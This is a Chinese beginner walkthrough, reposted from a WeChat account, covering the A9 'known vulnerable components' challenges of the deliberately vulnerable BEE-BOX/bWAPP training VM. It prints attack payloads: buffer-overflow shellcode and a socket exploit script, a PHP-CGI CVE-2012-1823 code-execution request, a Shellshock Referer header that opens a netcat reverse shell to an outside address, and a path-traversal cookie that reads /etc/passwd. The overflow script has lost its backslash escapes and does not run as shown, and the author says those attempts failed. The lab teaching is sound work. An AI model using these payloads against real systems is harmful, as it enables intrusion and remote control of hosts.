新手入门靶机BEE-BOX教程—第二章A9(十)

admin
admin
admin
102620
文章
87
评论
2021年8月31日18:28:52评论148 views字数 4991阅读16分38秒阅读模式

新手入门靶机BEE-BOX教程—第二章A9(十)

△△△点击上方“蓝字”关注我们了解更多精彩




0x00 Preface [前言/简介]

接着上一篇文章,更新BEE-BOX A8题目,有不理解这些靶机是哪儿的小伙伴或者查看以前的篇幅,传送门:
https://mp.weixin.qq.com/s/xp4YvWQLB6SQXbHnAjKo2w

注:本文尽量寻找通俗易懂原理,如果有不清楚等地方,可以看着靶机进行走一遍,我所做的靶机题目都是属于LOW,请大神勿喷。



0x01 BEE-BOX习题:A9-Using Known Vulnerable Components

新手入门靶机BEE-BOX教程—第二章A9(十)




0x02 A9-Using Known Vulnerable Components

1、Buffer Overflow (Local)
使用msf的模块:linux/x86/exec
然后用generate -b 'x00' -e x86/opt_sub -f bash 命令将shellcode输出来。

新手入门靶机BEE-BOX教程—第二章A9(十)

然后将shellcode进行编码:
{ echo -n '; cat /tmp/payload.txt; echo -n '; } | perl -pe's/(.)/sprintf("%%%02X", ord($1))/seg'

打开这个关卡,进行抓包,将编码出来后的发过去,由于不熟悉这个,导致
一直复现失败= =(我真的菜),所以打算给一个
作者做好的shellcode。(有机会再复现一下= =)
参考URL:
https://ejtaal.net/infosec/beebox.html
%27%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%8F%92%04%08%54%58%2D%05%FD%FD%FD%2D%01%01%01%01%2D%01%01%01%01%50%5C%25%01%01%01%01%25%02%02%02%02%2D%75%1C%30%7D%2D%01%01%01%01%2D%01%01%01%01%50%2D%14%DF%74%2B%2D%01%01%01%01%2D%01%01%01%01%50%2D%08%90%25%E1%2D%01%01%01%01%2D%01%01%01%01%50%2D%67%6C%FE%0B%2D%01%01%01%01%2D%01%01%01%01%50%2D%AC%15%24%60%2D%01%01%01%01%2D%01%01%01%01%50%2D%E7%77%7D%1A%2D%01%01%01%01%2D%01%01%01%01%50%2D%67%04%58%7F%2D%01%01%01%01%2D%01%01%01%01%50%2D%96%36%BA%F7%2D%01%01%01%01%2D%01%01%01%01%50%2D%39%CA%E7%7E%2D%01%01%01%01%2D%01%01%01%01%50%2D%92%0E%21%7D%2D%01%01%01%01%2D%01%01%01%01%50%2D%07%E6%58%0E%2D%01%01%01%01%2D%01%01%01%01%50%27

新手入门靶机BEE-BOX教程—第二章A9(十)

新手入门靶机BEE-BOX教程—第二章A9(十)


2、Buffer Overflow (Remote)
页面上提示说特定网络服务有缓冲溢出,那我们先扫描一下端口。

新手入门靶机BEE-BOX教程—第二章A9(十)


发现很多端口都认识的,对于陌生的我们尝试用telnet看看,发现666端口是跟上一题一样,那就说明就是666它了。

新手入门靶机BEE-BOX教程—第二章A9(十)


还是使用上一条的payload,但是需要用脚本:
#!/usr/bin/pythonimport socket
shellcode = ("x54x58x2dx3dxfcxfdxfdx2dx01x01x01x01x2dx01x01x01x01x50x5cx25x01x01x01x01x25x02x02x02x02x2dx75x1cx30x7dx2dx01x01x01x01x2dx01x01\x01x01x50x2dx1fxdfx74x2bx2dx01x01x01x01x2dx01x01x01x01x50x2dx37x9cxf3xddx2dx01x01x01x01x2dx01x01x01x01x50x2dxfexfdxf5x02x2dx01\x01x01x01x2dx01x01x01x01x50x2dx0dx33x02x4cx2dx01x01x01x01x2dx01x01x01x01x50x2dxeex0ax36xaax2dx01x01x01x01x2dx01x01x01x01x50x2dx0exe6xfax39x2dx01x01x01x01x2dx01x01x01x01x50x2dxf0x04xfcxfcx2dx01x01x01x01x2dx01x01x01x01x50x2dxfexfdxfbx01x2dx01x01x01x01x2dx01x01x01x01x50x2dxfexfdxfbxfax2dx01x01x01x01x2dx01x01x01x01x50x2dx0cxfexfax03x2dx01x01x01x01x2dx01x01x01x01x50x2dxb2xb8xc0xbfx2dx01x01x01x01x2dx01x01x01x01x50x2dxfcx10x54x41x2dx01x01x01x01x2dx01x01x01x01x50x2dx3ex61x1ex2bx2dx01x01x01x01x2dx01x01x01x01x50x2dxa3x1axabx15x2dx01x01x01x01x2dx01x01x01x01x50x2dx58x7fxe7x77x2dx01x01x01x01x2dx01x01x01x01x50x2dxbaxf7x66x04x2dx01x01x01x01x2dx01x01x01x01x50x2dxe8x7ex95x36x2dx01x01x01x01x2dx01x01x01x01x50x2dx21x7dx39xcax2dx01x01x01x01x2dx01x01x01x01x50x2dx59x0ex92x0ex2dx01x01x01x01x2dx01x01x01x01x50x2dx79xc5x06xe6x2dx01x01x01x01x2dx01x01x01x01x50")
# HINT: x90*354 + xa7x8fx04x08 + [payload] (remote)ret = "xa7x8fx04x08" buffer = 'x90' * 354 + ret + shellcode + "rn"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print "nSending evil buffer..."s.connect(('192.168.145.128',666))s.send(buffer)data = s.recv(1024)s.close()
emmmmmmm....缓冲溢出我就没成功过.....各位表哥们做吧,成功了给我看看....我放弃了....太累人了

新手入门靶机BEE-BOX教程—第二章A9(十)

3、Drupal SQL Injection (Drupageddon)
这题做过的,下一道

4、Heartbleed Vulnerability

这题做过的,下一道

5、PHP CGI Remote Code Execution

php cgi的远程代码执行漏洞,2012年非常经典的一枚漏洞,题目也给出了相关的提示CVE-2012-1823,详情请看URL:
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html

payload:空格跟=用url编码
/bWAPP/admin/phpinfo.php/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input
<?php system('id')?>

新手入门靶机BEE-BOX教程—第二章A9(十)


6、PHP Eval Function
源码里查看到使用了eval()函数,没有做任何过滤。

新手入门靶机BEE-BOX教程—第二章A9(十)

新手入门靶机BEE-BOX教程—第二章A9(十)


7、phpMyAdmin BBCode Tag XSS
这题做过的,下一道

8、Shellshock Vulnerability (CGI)
题目上提示了:attack the referer header,从源码上看会加载一个shellcode.sh的脚本。

新手入门靶机BEE-BOX教程—第二章A9(十)


我们使用burp抓包,然后加载脚本的时候,修改Referer,直接反弹shell。
payload:

() { :; }; (/bin/bash -c "nc 192.168.177.129 8080 -e /bin/bash")  

新手入门靶机BEE-BOX教程—第二章A9(十)


9、SQLiteManager Local File Inclusion
这个是CVE-2007-1232,直接找payload,在cookie里添加:
SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;

新手入门靶机BEE-BOX教程—第二章A9(十)


10、SQLiteManager PHP Code Injection
作者已经给出了脚本,就不演示了。

11、SQLiteManager XSS

做过的了,跳过。



0x03 Summary 总结
A9做的我是真的吐血,以为都做好了思想准备了,缓冲溢出的2个硬是做了好多天没做出来,还是放弃了。等技术好了之后再来锤他们= =!!哭了....技术太菜了。

END



如您有任何问题、建议、需求请后台留言NOVASEC公众号!


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


新手入门靶机BEE-BOX教程—第二章A9(十)


如有任何问题、建议、合作、投稿请加NOVASEC-MOYU,以方便及时回复。


如果需要靶机,后台回复小蜜蜂即可获得资源。

本文始发于微信公众号(NOVASEC):新手入门靶机BEE-BOX教程—第二章A9(十)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月31日18:28:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   新手入门靶机BEE-BOX教程—第二章A9(十)http://cn-sec.com/archives/494548.html

发表评论

匿名网友 填写信息